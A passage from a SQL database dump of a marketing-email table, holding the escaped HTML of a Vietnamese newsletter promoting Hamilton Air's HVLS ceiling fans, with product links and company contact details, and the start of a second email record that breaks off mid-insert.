0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-25\\\" style=\\\"max-width: 320px;min-width: 150px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"background-color: #ecf0f1;height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%;\\\">T\\u0103ng hi\\u1ec7u su\\u1ea5t v\\u00e0 gi\\u1ea3m ch\\u1ea5n th\\u01b0\\u01a1ng lao \\u0111\\u1ed9ng<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"150\\\" style=\\\"background-color: #ecf0f1;width: 150px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-25\\\" style=\\\"max-width: 320px;min-width: 150px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"background-color: #ecf0f1;height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%;\\\">Ti\\u1ebft ki\\u1ec7m chi ph\\u00ed n\\u0103ng l\\u01b0\\u1ee3ng<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"150\\\" style=\\\"background-color: #ecf0f1;width: 150px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-25\\\" style=\\\"max-width: 320px;min-width: 150px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"background-color: #ecf0f1;height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%;\\\">B\\u1ea3o v\\u1ec7 thi\\u1ebft b\\u1ecb<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f9f9f9;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #f9f9f9;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"background-color: #ecf0f1;width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"background-color: #ecf0f1;height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1681373213640-Powerful3-07.jpeg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\" class=\\\"v-src-width v-src-max-width\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/ceilingfan.vn\\/en\\/sunon-powerful-series-3\\\" style=\\\"height:37px; v-text-anchor:middle; width:111px;\\\" arcsize=\\\"11%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#3AAEE0\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;font-family:\'Open Sans\',sans-serif;\\\"><![endif]-->  \\r\\n    <a href=\\\"https:\\/\\/ceilingfan.vn\\/en\\/sunon-powerful-series-3\\\" target=\\\"_blank\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:\'Open Sans\',sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #3AAEE0; border-radius: 4px;-webkit-border-radius: 4px; -moz-border-radius: 4px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span style=\\\"display:block;padding:10px 20px;line-height:120%;\\\">Xem th\\u00eam<\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 1px solid #BBBBBB;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%;\\\">T\\u1ed0I \\u01afU H\\u00d3A KH\\u00cd H\\u1eacU TRONG NH\\u00c0 C\\u1ee6A B\\u1ea0N<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%;\\\">Qu\\u1ea1t HVLS m\\u1ea1nh m\\u1ebd gi\\u1ed1ng nh\\u01b0 l\\u00e0n gi\\u00f3 t\\u1ef1 nhi\\u00ean, n\\u00f3 s\\u1ebd t\\u1ea1o ra lu\\u1ed3ng kh\\u00f4ng kh\\u00ed l\\u1edbn v\\u00e0 \\u00eam d\\u1ecbu. N\\u00f3 c\\u00f3 th\\u1ec3 thay th\\u1ebf \\u0111i\\u1ec1u h\\u00f2a v\\u00e0 khi\\u1ebfn ng\\u01b0\\u1eddi ng\\u1ed3i trong xe c\\u1ea3m th\\u1ea5y ch\\u00eanh l\\u1ec7ch nhi\\u1ec7t \\u0111\\u1ed9 t\\u1eeb 5-8 \\u0111\\u1ed9. K\\u1ebft h\\u1ee3p v\\u1edbi h\\u1ec7 th\\u1ed1ng AC, n\\u00f3 l\\u00e0m gi\\u1ea3m chi ph\\u00ed. V\\u00e0o m\\u00f9a \\u0111\\u00f4ng, ch\\u1ebf \\u0111\\u1ed9 \\u0111\\u1ea3o ng\\u01b0\\u1ee3c c\\u00f3 th\\u1ec3 \\u0111\\u01b0\\u1ee3c chuy\\u1ec3n \\u0111\\u1ed5i \\u0111\\u1ec3 \\u0111\\u1ea9y kh\\u00f4ng kh\\u00ed \\u1ea5m tr\\u00ean m\\u00e1i nh\\u00e0\\/tr\\u1ea7n nh\\u00e0 xu\\u1ed1ng, \\u0111\\u1ea1t \\u0111\\u01b0\\u1ee3c hi\\u1ec7u qu\\u1ea3 \\u0111i\\u1ec1u ch\\u1ec9nh nhi\\u1ec7t \\u0111\\u1ed9.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1681373287133-v.jpeg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\" class=\\\"v-src-width v-src-max-width\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"tel:0386876274\\\" style=\\\"height:37px; v-text-anchor:middle; width:106px;\\\" arcsize=\\\"11%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#3AAEE0\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;font-family:\'Open Sans\',sans-serif;\\\"><![endif]-->  \\r\\n    <a href=\\\"tel:0386876274\\\" target=\\\"_blank\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:\'Open Sans\',sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #3AAEE0; border-radius: 4px;-webkit-border-radius: 4px; -moz-border-radius: 4px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span style=\\\"display:block;padding:10px 20px;line-height:120%;\\\">G\\u1eccI NGAY<\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #272362;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #272362;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"background-color: #ecf0f1;width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"background-color: #ecf0f1;height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 1px solid #BBBBBB;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:23px 40px 10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #b8b8b8; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"color: #000000; line-height: 19.6px;\\\">T\\u1ed5ng \\u0111\\u00e0i b\\u00e1n h\\u00e0ng: 028.73033369<\\/span><br \\/><span style=\\\"color: #000000; line-height: 19.6px;\\\">EMAIL: sale@hogiaphat.vn\\u00a0<\\/span><br \\/><span style=\\\"color: #000000; line-height: 19.6px;\\\">SR Th\\u1ee7 \\u0110\\u1ee9c: 184 Tr\\u1ea7n L\\u1ef1u, An Ph\\u00fa, Tp Th\\u1ee7 \\u0110\\u1ee9c, Tp HCM<\\/span><\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"color: #000000; line-height: 19.6px;\\\">SR Qu\\u1eadn 7: Happy Valley, 812 Nguy\\u1ec5n V\\u0103n Linh, T\\u00e2n Phong, Qu\\u1eadn 7, Tp HCM<\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:19px 19px 0px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"91%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 1px solid #616888;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:15px 40px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #bbbbbb; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 12px; line-height: 16.8px; color: #000000;\\\">\\u00a9Hamiton Air Fans\\u2122. All Rights Reserved.<\\/span><\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 12px; line-height: 16.8px; color: #000000;\\\">C\\u00d4NG TY C\\u1ed4 PH\\u1ea6N C\\u00d4NG NGH\\u1ec6 HAMILTON AIR<br \\/>MST: 0315778682 do s\\u1edf KH v\\u00e0 \\u0111\\u1ea7u t\\u01b0 Tp.HCM.\\u00a0<\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n    <!--[if (mso)|(IE)]><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n  <\\/tbody>\\r\\n  <\\/table>\\r\\n  <!--[if mso]><\\/div><![endif]-->\\r\\n  <!--[if IE]><\\/div><![endif]-->\\r\\n<\\/body>\\r\\n\\r\\n<\\/html>\\r\\n\"');
INSERT INTO `tblma_emails` (`id`, `name`, `type`, `category`, `segment`, `published`, `language`, `description`, `addedfrom`, `dateadded`, `color`, `subject`, `email_template`, `from_name`, `from_address`, `reply_to_address`, `bcc_address`, `attachment`, `data_design`, `data_html`) VALUES
(12, 'Haiku L mang đến sự thoải mái hoàn hảo', '', 9, 0, 1, 'vietnamese', '', 18, '2023-04-14 09:37:27', '', 'Haiku L mang đến sự thoải mái với sự hoàn hảo sự im lặng và một kiểu dáng đẹp, thiết kế cổ điển.', 12, '', '', '', '', '', '\"{\\\"counters\\\":{\\\"u_row\\\":8,\\\"u_column\\\":9,\\\"u_content_text\\\":11,\\\"u_content_image\\\":5,\\\"u_content_button\\\":5,\\\"u_content_social\\\":1,\\\"u_content_divider\\\":4,\\\"u_content_html\\\":1,\\\"u_content_menu\\\":1},\\\"body\\\":{\\\"id\\\":\\\"0u7zmWfe6N\\\",\\\"rows\\\":[{\\\"id\\\":\\\"mzyaBaFj3Q\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"U5J6RuT_G3\\\",\\\"contents\\\":[{\\\"id\\\":\\\"PU1AcFTaVA\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"15px 10px 